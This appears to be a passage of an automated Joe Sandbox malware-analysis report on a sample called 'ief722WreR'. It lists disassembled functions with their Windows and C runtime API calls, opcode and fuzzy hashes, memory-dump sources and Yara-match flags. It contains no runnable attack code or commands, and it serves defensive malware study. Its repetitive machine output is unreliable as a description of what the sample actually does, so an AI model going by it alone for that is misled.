                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::Exception@8FreeIdleProxyProxy::ReturnThreadThrowstd::invalid_argument::invalid_argument
                                                      • String ID: pContext
                                                      • API String ID: 1990795212-2046700901
                                                      • Opcode ID: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                      • Instruction ID: d6030a9334a08ef0062fa40f2a301b8df50c17ab577a7f1bba150cce5c194b06
                                                      • Opcode Fuzzy Hash: dcb52fd98b5584c3b80ff9d31c366c3a26bd7d11e6a20f09b24124f16e188ac1
                                                      • Instruction Fuzzy Hash: D7E09B39B0011467CA04F765D80695DB7A9AEC0714755416BB915A3241DFB8A90586D8
                                                      APIs
                                                      • CloseHandle.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E053
                                                      • FreeLibrary.KERNEL32(00000000,00000000,?,0042E10D,00000000), ref: 0042E062
                                                      • _free.LIBCMT ref: 0042E069
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: CloseFreeHandleLibrary_free
                                                      • String ID: B
                                                      • API String ID: 621396759-3071617958
                                                      • Opcode ID: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                      • Instruction ID: a93fca9343643b9b680b6377b12e384c9985fdeb2938c0e091f6cd96b84218d4
                                                      • Opcode Fuzzy Hash: 0165a14a54266ee5ab41e8b6b77e2709d96a9db653e1905d24e2523b41a394a7
                                                      • Instruction Fuzzy Hash: 14E04F32101B30EFD7315F06F808B47BB94AB11722F54842AE51911560C7B9A981CB98
                                                      APIs
                                                      • std::invalid_argument::invalid_argument.LIBCONCRT ref: 00415DBA
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 00415DC8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Exception@8Throwstd::invalid_argument::invalid_argument
                                                      • String ID: pScheduler$version
                                                      • API String ID: 1687795959-3154422776
                                                      • Opcode ID: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                      • Instruction ID: 95b2f980cd051b55abb92df33f42c2b53280e6b9db569f6f3bca5c1500423481
                                                      • Opcode Fuzzy Hash: cf3dcf23f28e66e546165a95d4b975c1e77b3dfef9a7f971167f04e255c6b8ec
                                                      • Instruction Fuzzy Hash: EEE08630900608F6CB14EA55D80ABDD77A56B51749F61C127785961091CBBC96C8CB4E
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                      • Instruction ID: f9e2c614c97b109978af50d7c538c2258677b2925616371172d48f7c9f1fa5ee
                                                      • Opcode Fuzzy Hash: c132ce8b7a779d48d325dc1464a826f382782a4d305ff920fa0063c7638d007e
                                                      • Instruction Fuzzy Hash: 44A15772A00B869FE721DE28C8817AEFBE5EF59310F28426FD5859B381C23C9D41C759
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: __alldvrm$_strrchr
                                                      • String ID:
                                                      • API String ID: 1036877536-0
                                                      • Opcode ID: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                      • Instruction ID: f0edb284ff9d10d3d76a5d0d67dae2d2e15d3feffadf350e7c9a46ec075d46fd
                                                      • Opcode Fuzzy Hash: 64c4271fdf953b23329a06ffcbcc4f91b3e2631876221f6b3ba7206c8ff3dfb5
                                                      • Instruction Fuzzy Hash: 3EA136759043869FDB238F28C8917EEFBA6EF15310F58826FD5859B381C7348942CB60
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                      • Instruction ID: 6d56401385933203687979e97415ab0492b269b4cfaee778896e5051d0ede453
                                                      • Opcode Fuzzy Hash: 84a4b3704c3f7d6daab1b53251b5dd7fc6fa1148bfcc679931bd75404ad43a52
                                                      • Instruction Fuzzy Hash: B6413871F00110ABDB247BBB9C42AAF7AA4EF4D334F24263BF418C6291D63C5D49426D
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      • Opcode ID: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                      • Instruction ID: 095c710ee9e994dcb2b9cfb679337f9f9b236fc9f4050e306e2b2a75d027de5c
                                                      • Opcode Fuzzy Hash: bd0f664e10209082f8b28efdae44aad90b5cc59672f94763d63ba3a93ec53303
                                                      • Instruction Fuzzy Hash: 36411B31A001016BDB276FBA8C54BEF3A6EEF55770F15062BF42DD6690D73444498A71
                                                      APIs
                                                      • MultiByteToWideChar.KERNEL32(00000004,00000000,0000007F,004497A0,00000000,00000000,8B56FF8B,024B047A,?,00000004,00000001,004497A0,0000007F,?,8B56FF8B,00000001), ref: 024B6B51
                                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 024B6BDA
                                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 024B6BEC
                                                      • __freea.LIBCMT ref: 024B6BF5
                                                        • Part of subcall function 024B390E: RtlAllocateHeap.NTDLL(00000000,0248DAD7,00000000), ref: 024B3940
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                      • String ID:
                                                      • API String ID: 2652629310-0
                                                      • Opcode ID: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                      • Instruction ID: 63321ccd77c4759da82375cd2f086b743bbe8154c7d3b96501322c6172a1f708
                                                      • Opcode Fuzzy Hash: f539721af51ef4dd6626a895736c7405872fbe6a6618a76e85aa91417d7c7683
                                                      • Instruction Fuzzy Hash: CB31A072A0021AABDF269F65CC80DEF7BB9EF40714B0A426EEC14D7250E735D951CBA0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                      • String ID:
                                                      • API String ID: 531285432-0
                                                      • Opcode ID: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                      • Instruction ID: bdb17b43c911747218acdb07252438506425be6b3c89ff1608d2b8794f0e438d
                                                      • Opcode Fuzzy Hash: da2a6c6b9017671071464d2307a86bc0750b5fd4e9f11ab54acb932ed93cd1ef
                                                      • Instruction Fuzzy Hash: 0D213B75E002099FDF00EFE5DC829AEB7B8EF49714F10406AF901B7291DB78AD058BA5
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Xtime_diff_to_millis2_xtime_get
                                                      • String ID:
                                                      • API String ID: 531285432-0
                                                      • Opcode ID: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                      • Instruction ID: 827b38b793d36ea6e6b2ea5190882c8299208065755ca927c20d4dfeddb356d8
                                                      • Opcode Fuzzy Hash: 100972eb18cca990445868258ca18565aedc37090e71be810c06a2a5d3a0331b
                                                      • Instruction Fuzzy Hash: 42214C75E11209AFDF00FFA5CC819BEB7B9EF09714F10006AE501A7290D770AD018BA0
                                                      APIs
                                                      • SetEvent.KERNEL32(?,00000000), ref: 00423739
                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423721
                                                        • Part of subcall function 0041B72C: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 0041B74D
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 0042376A
                                                      • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 00423793
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Context$Event$Base::Concurrency::details::$ThrowTrace$Exception@8
                                                      • String ID:
                                                      • API String ID: 2630251706-0
                                                      • Opcode ID: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                      • Instruction ID: dbe4a0063a9405d5797c392a8f70426852a24ed1b1212b264d4e29dc2c442ee4
                                                      • Opcode Fuzzy Hash: 5e2b662396c7d3b6cc96f7267498801861ae87d40925249520363ef0c9760137
                                                      • Instruction Fuzzy Hash: 7A110B747002106BCF04AF65DC85DAEB779EB84761B104167FA06D7292CBAC9D41CA98
                                                      APIs
                                                      • ShowWindow.USER32(00000005), ref: 00401FAF
                                                      • UpdateWindow.USER32 ref: 00401FB7
                                                      • ShowWindow.USER32(00000000), ref: 00401FCB
                                                      • MoveWindow.USER32(00000000,00000000,00000001,00000001,00000001), ref: 0040202E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Window$Show$MoveUpdate
                                                      • String ID:
                                                      • API String ID: 1339878773-0
                                                      • Opcode ID: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                      • Instruction ID: 602c8894019c05b7ebd6ce0fe59bebabc4bc12c6f09791b7d1b76da355fd2427
                                                      • Opcode Fuzzy Hash: 2df54f1dd07e67e892bb3b2eb89b8a5dbc035376ab2a5a7ebcd4eb7b767f49c1
                                                      • Instruction Fuzzy Hash: 2A016531E106109BC7258F19ED04A267BA6EFD5712B15803AF40C972B1D7B1EC428B9C
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 004290E3
                                                        • Part of subcall function 00429030: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 0042905F
                                                        • Part of subcall function 00429030: ___AdjustPointer.LIBCMT ref: 0042907A
                                                      • _UnwindNestedFrames.LIBCMT ref: 004290F8
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00429109
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 00429131
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                      • Instruction ID: 13de3582008bd49ed9905958b9893fc78844f15d2a413234128a3f7054c614fd
                                                      • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                      • Instruction Fuzzy Hash: 86018C32200158BBDF126F96EC41EEB7B69EF88758F444009FE0856121C73AEC71DBA8
                                                      APIs
                                                      • ___BuildCatchObject.LIBVCRUNTIME ref: 024A934A
                                                        • Part of subcall function 024A9297: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 024A92C6
                                                        • Part of subcall function 024A9297: ___AdjustPointer.LIBCMT ref: 024A92E1
                                                      • _UnwindNestedFrames.LIBCMT ref: 024A935F
                                                      • __FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 024A9370
                                                      • CallCatchBlock.LIBVCRUNTIME ref: 024A9398
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
                                                      • String ID:
                                                      • API String ID: 737400349-0
                                                      • Opcode ID: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                      • Instruction ID: dd7902a0b168ea5682338f3260862cf75cc75035effb19eefb516b138c717781
                                                      • Opcode Fuzzy Hash: 4c234fcb05df68dfcc16b4f48c2a8e8eee4e6b19d54e674357e13eac91ab2726
                                                      • Instruction Fuzzy Hash: 1B011732100148BBCF125E96CC50EEB3F7AEF58754F05441AFE0896120D372E861EBA0
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue), ref: 00434F61
                                                      • GetLastError.KERNEL32(?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000,00000364,?,00431FAC), ref: 00434F6D
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00434ED6,?,00000000,00000000,00000000,?,0043518E,00000006,FlsSetValue,0044A370,FlsSetValue,00000000), ref: 00434F7B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                      • Instruction ID: 16700c29e50b3fc45f4951a54cc89878b259fef574b9c48791ea2bf1872b2532
                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                      • Instruction Fuzzy Hash: 9A01FC366152226FC7214F69EC449A77798AF89F71F141631F905D7240D724E9018AEC
                                                      APIs
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000000,00000000,00000000,?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378), ref: 024B51C8
                                                      • GetLastError.KERNEL32(?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378,0044A370,0044A378,00000000,00000364,?,024B2213), ref: 024B51D4
                                                      • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,024B513D,00000000,00000000,00000000,00000000,?,024B53F5,00000006,0044A378,0044A370,0044A378,00000000), ref: 024B51E2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LibraryLoad$ErrorLast
                                                      • String ID:
                                                      • API String ID: 3177248105-0
                                                      • Opcode ID: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                      • Instruction ID: 66b8974f1e5ee743916ce639f37f79aeb4b5764888c21c1d9fe9e225dac22382
                                                      • Opcode Fuzzy Hash: 6e3cec70015223281cf71b6663bdf94dd3b9abd137b034a73729b65651623052
                                                      • Instruction Fuzzy Hash: 8001F736A02322ABC7234F799C44E97FB98AF46FA27540631F906E7240C720D941CAF4
                                                      APIs
                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00426148
                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 0042615C
                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00426174
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 0042618C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                      • String ID:
                                                      • API String ID: 78362717-0
                                                      • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                      • Instruction ID: ecb18499877976be64129c87880db9b40f2952d25c9d93d1b0c0aa07095992c1
                                                      • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                      • Instruction Fuzzy Hash: 2901F232700120B7DB12EE5A9801AFF77A99B94354F41005BFC11A7382DA24FD2192A8
                                                      APIs
                                                      • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 024A63AF
                                                      • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 024A63C3
                                                      • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 024A63DB
                                                      • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 024A63F3
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                      • String ID:
                                                      • API String ID: 78362717-0
                                                      • Opcode ID: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                      • Instruction ID: 3bec27d665a3d3717b1a3808e02f7a4e078401cc44891030c8c417e18893cc7d
                                                      • Opcode Fuzzy Hash: c8ef6192b05c3357363908c599ceeaf6275af44595a57e37f7ac34529dc1d332
                                                      • Instruction Fuzzy Hash: 9601D632600114B7CF16EE5AC860AAF779E9F65750F05005BEC21AB381DAB0ED128BA0
                                                      APIs
                                                      • Concurrency::location::_Assign.LIBCMT ref: 024A2BB1
                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024A2BCF
                                                        • Part of subcall function 02498687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024986A8
                                                        • Part of subcall function 02498687: Hash.LIBCMT ref: 024986E8
                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024A2BD8
                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024A2BF8
                                                        • Part of subcall function 0249F6DF: Hash.LIBCMT ref: 0249F6F1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                      • String ID:
                                                      • API String ID: 2250070497-0
                                                      • Opcode ID: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                      • Instruction ID: a6b3322d4b83997d53398a9e39bde1422cbac09e96d07a3371cc48c22dd9c190
                                                      • Opcode Fuzzy Hash: d379dd8d035abd09aa72343d0417816ebca02f1086c5fe86f80796eb41e1f0bb
                                                      • Instruction Fuzzy Hash: C1117C76400204AFC715DF65C880ACAFBF9BF59320B014A1EE9568B591DBB0A914CBA0
                                                      APIs
                                                      • Concurrency::location::_Assign.LIBCMT ref: 024A2BB1
                                                      • Concurrency::details::SchedulerBase::GetBitSet.LIBCONCRT ref: 024A2BCF
                                                        • Part of subcall function 02498687: Concurrency::details::QuickBitSet::QuickBitSet.LIBCMT ref: 024986A8
                                                        • Part of subcall function 02498687: Hash.LIBCMT ref: 024986E8
                                                      • Concurrency::details::QuickBitSet::operator=.LIBCMT ref: 024A2BD8
                                                      • Concurrency::details::SchedulerBase::GetResourceMaskId.LIBCONCRT ref: 024A2BF8
                                                        • Part of subcall function 0249F6DF: Hash.LIBCMT ref: 0249F6F1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Concurrency::details::$Quick$Base::HashScheduler$AssignConcurrency::location::_MaskResourceSet::Set::operator=
                                                      • String ID:
                                                      • API String ID: 2250070497-0
                                                      • Opcode ID: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                      • Instruction ID: be4a4b3d581b6e66caf45d2d5b2ad42161672202806dbcd7acd34a4724b8dfce
                                                      • Opcode Fuzzy Hash: 36e6617bf236213b9ae2a6ec488584fbad12b714714c281d1e824cb46c32bc20
                                                      • Instruction Fuzzy Hash: 58012D76410604ABC714DF66C881EDAF7E9FF59310F008A1EE55687550DBB0F954CF60
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 00405926
                                                        • Part of subcall function 0040BB47: __EH_prolog3_GS.LIBCMT ref: 0040BB4E
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 00405971
                                                      • __Getcoll.LIBCPMT ref: 00405980
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 00405990
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID:
                                                      • API String ID: 1836011271-0
                                                      • Opcode ID: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                      • Instruction ID: 86b703767978d3f357e5c0a9ff64a1160fbba7df876fc0f231fbc64f2b881c41
                                                      • Opcode Fuzzy Hash: b2086962ebb7fbd856c4700f929e36ee99930e1b9d7654548193c6010b29d428
                                                      • Instruction Fuzzy Hash: 6C013271900208DFDB00EFA5C481B9EB7B0AF40328F10857EE055AB682DB789988CF98
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 024850D1
                                                        • Part of subcall function 0248BDAE: __EH_prolog3_GS.LIBCMT ref: 0248BDB5
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 0248511C
                                                      • __Getcoll.LIBCPMT ref: 0248512B
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 0248513B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID:
                                                      • API String ID: 1836011271-0
                                                      • Opcode ID: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                      • Instruction ID: 5a16ee00e9a584453990e86ad8480014c5bc187271322bba7073226ba3c9bbe9
                                                      • Opcode Fuzzy Hash: ce8e97c7b3e0e4b8e3963538bfe6a83f80fa99162acc7c008c480bb19ea72e88
                                                      • Instruction Fuzzy Hash: B5018872D21208AFDB04FFA5C480BADBBB2BF54315F50802FD055AB280DB749584CFA1
                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 02485B8D
                                                        • Part of subcall function 0248BDAE: __EH_prolog3_GS.LIBCMT ref: 0248BDB5
                                                      • std::_Locinfo::_Locinfo.LIBCPMT ref: 02485BD8
                                                      • __Getcoll.LIBCPMT ref: 02485BE7
                                                      • std::_Locinfo::~_Locinfo.LIBCPMT ref: 02485BF7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: H_prolog3_Locinfostd::_$GetcollLocinfo::_Locinfo::~_
                                                      • String ID:
                                                      • API String ID: 1836011271-0
                                                      • Opcode ID: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                      • Instruction ID: 00f1e3fa62b0cdf8d9b5797c7a9d18da9a67237fba80cabd9777ea8b6fb86896
                                                      • Opcode Fuzzy Hash: 3ebc28f69e14e8dd5a6cad0ea50d7dfb5222f187d88c1105b0055cabbf9d92ae
                                                      • Instruction Fuzzy Hash: 200148729212089FDB04FFA5D484BADBBB1BF54325F50802FD055AB280DBB89984CFA5
                                                      APIs
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF09
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF19
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF29
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0041BF3D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Compare_exchange_acquire_4std::_
                                                      • String ID:
                                                      • API String ID: 3973403980-0
                                                      • Opcode ID: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                      • Instruction ID: a39f72e40e0a7d69bee2e58a2fbea005eb0d9eb8afdd5f219c4e4bdc303a66e9
                                                      • Opcode Fuzzy Hash: 3b89475e2bdafd6ed96e14fd4d006d48e41723d7c24de3c610b0d4f4f0c7b455
                                                      • Instruction Fuzzy Hash: 3201FB3745414DBBCF119E64DD429EE3B66EB05354B188417F918C4231C336CAB2AF8D
                                                      APIs
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C170
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C180
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C190
                                                      • std::_Compare_exchange_acquire_4.LIBCONCRT ref: 0249C1A4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
